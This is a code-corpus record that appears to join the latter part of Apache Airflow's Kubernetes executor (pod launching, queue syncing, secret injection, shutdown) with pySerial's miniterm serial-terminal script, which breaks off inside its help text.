self.log.debug("Kubernetes launching image %s", pod.spec.containers[0].image)
# the watcher will monitor pods, so we do not block.
self.launcher.run_pod_async(pod, **self.kube_config.kube_client_request_args)
self.log.debug("Kubernetes Job created!")
def delete_pod(self, pod_id: str, namespace: str) -> None:
"""Deletes POD"""
try:
self.kube_client.delete_namespaced_pod(
pod_id, namespace, body=client.V1DeleteOptions(**self.kube_config.delete_option_kwargs),
**self.kube_config.kube_client_request_args)
except ApiException as e:
# If the pod is already deleted
if e.status != 404:
raise
def sync(self) -> None:
"""
The sync function checks the status of all currently running kubernetes jobs.
If a job is completed, its status is placed in the result queue to
be sent back to the scheduler.
:return:
"""
self._health_check_kube_watcher()
while True:
try:
task = self.watcher_queue.get_nowait()
try:
self.process_watcher_task(task)
finally:
self.watcher_queue.task_done()
except Empty:
break
def process_watcher_task(self, task: KubernetesWatchType) -> None:
"""Process the task by watcher."""
pod_id, namespace, state, annotations, resource_version = task
self.log.info(
'Attempting to finish pod; pod_id: %s; state: %s; annotations: %s',
pod_id, state, annotations
)
key = self._annotations_to_key(annotations=annotations)
if key:
self.log.debug('finishing job %s - %s (%s)', key, state, pod_id)
self.result_queue.put((key, state, pod_id, namespace, resource_version))
def _annotations_to_key(self, annotations: Dict[str, str]) -> Optional[TaskInstanceKey]:
dag_id = annotations['dag_id']
task_id = annotations['task_id']
try_number = int(annotations['try_number'])
execution_date = parser.parse(annotations['execution_date'])
return TaskInstanceKey(dag_id, task_id, execution_date, try_number)
@staticmethod
def _strip_unsafe_kubernetes_special_chars(string: str) -> str:
"""
Kubernetes only supports lowercase alphanumeric characters and "-" and "." in
the pod name
However, there are special rules about how "-" and "." can be used so let's
only keep
alphanumeric chars see here for detail:
https://kubernetes.io/docs/concepts/overview/working-with-objects/names/
:param string: The requested Pod name
:return: ``str`` Pod name stripped of any unsafe characters
"""
return ''.join(ch.lower() for ind, ch in enumerate(string) if ch.isalnum())
@staticmethod
def _make_safe_pod_id(safe_dag_id: str, safe_task_id: str, safe_uuid: str) -> str:
r"""
Kubernetes pod names must be <= 253 chars and must pass the following regex for
validation
``^[a-z0-9]([-a-z0-9]*[a-z0-9])?(\\.[a-z0-9]([-a-z0-9]*[a-z0-9])?)*$``
:param safe_dag_id: a dag_id with only alphanumeric characters
:param safe_task_id: a task_id with only alphanumeric characters
:param safe_uuid: a uuid
:return: ``str`` valid Pod name of appropriate length
"""
safe_key = safe_dag_id + safe_task_id
safe_pod_id = safe_key[:MAX_POD_ID_LEN - len(safe_uuid) - 1] + "-" + safe_uuid
return safe_pod_id
@staticmethod
def _create_pod_id(dag_id: str, task_id: str) -> str:
safe_dag_id = AirflowKubernetesScheduler._strip_unsafe_kubernetes_special_chars(
dag_id)
safe_task_id = AirflowKubernetesScheduler._strip_unsafe_kubernetes_special_chars(
task_id)
return safe_dag_id + safe_task_id
def _flush_watcher_queue(self) -> None:
self.log.debug('Executor shutting down, watcher_queue approx. size=%d', self.watcher_queue.qsize())
while True:
try:
task = self.watcher_queue.get_nowait()
# Ignoring it since it can only have either FAILED or SUCCEEDED pods
self.log.warning('Executor shutting down, IGNORING watcher task=%s', task)
self.watcher_queue.task_done()
except Empty:
break
def terminate(self) -> None:
"""Terminates the watcher."""
self.log.debug("Terminating kube_watcher...")
self.kube_watcher.terminate()
self.kube_watcher.join()
self.log.debug("kube_watcher=%s", self.kube_watcher)
self.log.debug("Flushing watcher_queue...")
self._flush_watcher_queue()
# Queue should be empty...
self.watcher_queue.join()
self.log.debug("Shutting down manager...")
self._manager.shutdown()
class KubernetesExecutor(BaseExecutor, LoggingMixin):
"""Executor for Kubernetes"""
def __init__(self):
self.kube_config = KubeConfig()
self._manager = multiprocessing.Manager()
self.task_queue: 'Queue[KubernetesJobType]' = self._manager.Queue()
self.result_queue: 'Queue[KubernetesResultsType]' = self._manager.Queue()
self.kube_scheduler: Optional[AirflowKubernetesScheduler] = None
self.kube_client: Optional[client.CoreV1Api] = None
self.worker_uuid: Optional[str] = None
super().__init__(parallelism=self.kube_config.parallelism)
@provide_session
def clear_not_launched_queued_tasks(self, session=None) -> None:
"""
If the airflow scheduler restarts with pending "Queued" tasks, the tasks may or
may not
have been launched. Thus on starting up the scheduler let's check every
"Queued" task to
see if it has been launched (ie: if there is a corresponding pod on kubernetes)
If it has been launched then do nothing, otherwise reset the state to "None" so
the task
will be rescheduled
This will not be necessary in a future version of airflow in which there is
proper support
for State.LAUNCHED
"""
if not self.kube_client:
raise AirflowException(NOT_STARTED_MESSAGE)
queued_tasks = session \
.query(TaskInstance) \
.filter(TaskInstance.state == State.QUEUED).all()
self.log.info(
'When executor started up, found %s queued task instances',
len(queued_tasks)
)
for task in queued_tasks:
# pylint: disable=protected-access
dict_string = (
"dag_id={},task_id={},execution_date={},airflow-worker={}".format(
pod_generator.make_safe_label_value(task.dag_id),
pod_generator.make_safe_label_value(task.task_id),
pod_generator.datetime_to_label_safe_datestring(
task.execution_date
),
self.worker_uuid
)
)
# pylint: enable=protected-access
kwargs = dict(label_selector=dict_string)
if self.kube_config.kube_client_request_args:
for key, value in self.kube_config.kube_client_request_args.items():
kwargs[key] = value
pod_list = self.kube_client.list_namespaced_pod(
self.kube_config.kube_namespace, **kwargs)
if not pod_list.items:
self.log.info(
'TaskInstance: %s found in queued state but was not launched, '
'rescheduling', task
)
session.query(TaskInstance).filter(
TaskInstance.dag_id == task.dag_id,
TaskInstance.task_id == task.task_id,
TaskInstance.execution_date == task.execution_date
).update({TaskInstance.state: State.NONE})
def _inject_secrets(self) -> None:
def _create_or_update_secret(secret_name, secret_path):
try:
return self.kube_client.create_namespaced_secret(
self.kube_config.executor_namespace, kubernetes.client.V1Secret(
data={
'key.json': base64.b64encode(open(secret_path, 'r').read())},
metadata=kubernetes.client.V1ObjectMeta(name=secret_name)),
**self.kube_config.kube_client_request_args)
except ApiException as e:
if e.status == 409:
return self.kube_client.replace_namespaced_secret(
secret_name, self.kube_config.executor_namespace,
kubernetes.client.V1Secret(
data={'key.json': base64.b64encode(
open(secret_path, 'r').read())},
metadata=kubernetes.client.V1ObjectMeta(name=secret_name)),
**self.kube_config.kube_client_request_args)
self.log.exception(
'Exception while trying to inject secret. '
'Secret name: %s, error details: %s',
secret_name, e
)
raise
def start(self) -> None:
"""Starts the executor"""
self.log.info('Start Kubernetes executor')
self.worker_uuid = KubeWorkerIdentifier.get_or_create_current_kube_worker_uuid()
if not self.worker_uuid:
raise AirflowException("Could not get worker uuid")
self.log.debug('Start with worker_uuid: %s', self.worker_uuid)
# always need to reset resource version since we don't know
# when we last started, note for behavior below
# https://github.com/kubernetes-client/python/blob/master/kubernetes/docs
# /CoreV1Api.md#list_namespaced_pod
KubeResourceVersion.reset_resource_version()
self.kube_client = get_kube_client()
self.kube_scheduler = AirflowKubernetesScheduler(
self.kube_config, self.task_queue, self.result_queue,
self.kube_client, self.worker_uuid
)
self._inject_secrets()
self.clear_not_launched_queued_tasks()
def execute_async(self,
key: TaskInstanceKey,
command: CommandType,
queue: Optional[str] = None,
executor_config: Optional[Any] = None) -> None:
"""Executes task asynchronously"""
self.log.info(
'Add task %s with command %s with executor_config %s',
key, command, executor_config
)
kube_executor_config = PodGenerator.from_obj(executor_config)
if not self.task_queue:
raise AirflowException(NOT_STARTED_MESSAGE)
self.task_queue.put((key, command, kube_executor_config))
def sync(self) -> None:
"""Synchronize task state."""
if self.running:
self.log.debug('self.running: %s', self.running)
if self.queued_tasks:
self.log.debug('self.queued: %s', self.queued_tasks)
if not self.worker_uuid:
raise AirflowException(NOT_STARTED_MESSAGE)
if not self.kube_scheduler:
raise AirflowException(NOT_STARTED_MESSAGE)
if not self.kube_config:
raise AirflowException(NOT_STARTED_MESSAGE)
if not self.result_queue:
raise AirflowException(NOT_STARTED_MESSAGE)
if not self.task_queue:
raise AirflowException(NOT_STARTED_MESSAGE)
self.kube_scheduler.sync()
last_resource_version = None
while True: # pylint: disable=too-many-nested-blocks
try:
results = self.result_queue.get_nowait()
try:
key, state, pod_id, namespace, resource_version = results
last_resource_version = resource_version
self.log.info('Changing state of %s to %s', results, state)
try:
self._change_state(key, state, pod_id, namespace)
except Exception as e: # pylint: disable=broad-except
self.log.exception(
"Exception: %s when attempting to change state of %s to %s, re-queueing.",
e, results, state
)
self.result_queue.put(results)
finally:
self.result_queue.task_done()
except Empty:
break
KubeResourceVersion.checkpoint_resource_version(last_resource_version)
# pylint: disable=too-many-nested-blocks
for _ in range(self.kube_config.worker_pods_creation_batch_size):
try:
task = self.task_queue.get_nowait()
try:
self.kube_scheduler.run_next(task)
except ApiException as e:
if e.reason == "BadRequest":
self.log.error("Request was invalid. Failing task")
key, _, _ = task
self.change_state(key, State.FAILED, e)
else:
self.log.warning('ApiException when attempting to run task, re-queueing. '
'Message: %s', json.loads(e.body)['message'])
self.task_queue.put(task)
finally:
self.task_queue.task_done()
except Empty:
break
# pylint: enable=too-many-nested-blocks
def _change_state(self,
key: TaskInstanceKey,
state: Optional[str],
pod_id: str,
namespace: str) -> None:
if state != State.RUNNING:
if self.kube_config.delete_worker_pods:
if not self.kube_scheduler:
raise AirflowException(NOT_STARTED_MESSAGE)
if state is not State.FAILED or self.kube_config.delete_worker_pods_on_failure:
self.kube_scheduler.delete_pod(pod_id, namespace)
self.log.info('Deleted pod: %s in namespace %s', str(key), str(namespace))
try:
self.running.remove(key)
except KeyError:
self.log.debug('Could not find key: %s', str(key))
self.event_buffer[key] = state, None
def _flush_task_queue(self) -> None:
if not self.task_queue:
raise AirflowException(NOT_STARTED_MESSAGE)
self.log.debug('Executor shutting down, task_queue approximate size=%d', self.task_queue.qsize())
while True:
try:
task = self.task_queue.get_nowait()
# This is a new task to run thus ok to ignore.
self.log.warning('Executor shutting down, will NOT run task=%s', task)
self.task_queue.task_done()
except Empty:
break
def _flush_result_queue(self) -> None:
if not self.result_queue:
raise AirflowException(NOT_STARTED_MESSAGE)
self.log.debug('Executor shutting down, result_queue approximate size=%d', self.result_queue.qsize())
while True: # pylint: disable=too-many-nested-blocks
try:
results = self.result_queue.get_nowait()
self.log.warning('Executor shutting down, flushing results=%s', results)
try:
key, state, pod_id, namespace, resource_version = results
self.log.info('Changing state of %s to %s : resource_version=%d', results, state,
resource_version)
try:
self._change_state(key, state, pod_id, namespace)
except Exception as e: # pylint: disable=broad-except
self.log.exception('Ignoring exception: %s when attempting to change state of %s '
'to %s.', e, results, state)
finally:
self.result_queue.task_done()
except Empty:
break
def end(self) -> None:
"""Called when the executor shuts down"""
if not self.task_queue:
raise AirflowException(NOT_STARTED_MESSAGE)
if not self.result_queue:
raise AirflowException(NOT_STARTED_MESSAGE)
if not self.kube_scheduler:
raise AirflowException(NOT_STARTED_MESSAGE)
self.log.info('Shutting down Kubernetes executor')
self.log.debug('Flushing task_queue...')
self._flush_task_queue()
self.log.debug('Flushing result_queue...')
self._flush_result_queue()
# Both queues should be empty...
self.task_queue.join()
self.result_queue.join()
if self.kube_scheduler:
self.kube_scheduler.terminate()
self._manager.shutdown()
def terminate(self):
"""Terminate the executor is not doing anything."""
|
miniterm.py
|
#!C:\Users\melih\PycharmProjects\ebook_study\venv\Scripts\python.exe
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0x0e)): # functions keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'sS': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
